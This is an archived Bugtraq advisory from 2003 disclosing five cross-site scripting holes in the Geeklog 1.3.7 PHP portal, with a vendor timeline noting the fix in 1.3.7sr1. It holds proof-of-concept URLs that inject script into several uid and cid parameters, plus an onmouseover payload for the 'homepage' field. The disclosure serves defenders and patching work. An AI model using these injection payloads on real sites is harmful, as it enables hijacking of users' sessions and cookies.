Bugtraq mailing list archives

Multiple XSS in Geeklog 1.3.7


From: snooq <jinyean () hotmail com>
Date: 14 Jan 2003 02:43:01 -0000



nothing new. typical XSS bugs.

summary
=======

Geeklog is a web portal system written in PHP.
There exists 5 XSS holes in the software.


the 'holes'
===========

--1--
http://vulnerable.host/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;

--2--
http://vulnerable.host/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;

--3--
http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;


--4--
http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
        

--5--
'homepage' field in the user's account information page
is not sanitised properly. As a result, javascript can
be injected by setting the 'homepage' field like this:

http://url"; onmouseover="alert(document.cookie)


** 3) & 4) were found by Dirk Haun of Geeklog Team. 


vendor status
=============

03/01/2003
contacted Dirk Haun of Geeklog team 
14/01/2003
Geeklog 1.3.7sr1 was released.
                New version closes all holes found.


--==snooq==--


Current thread: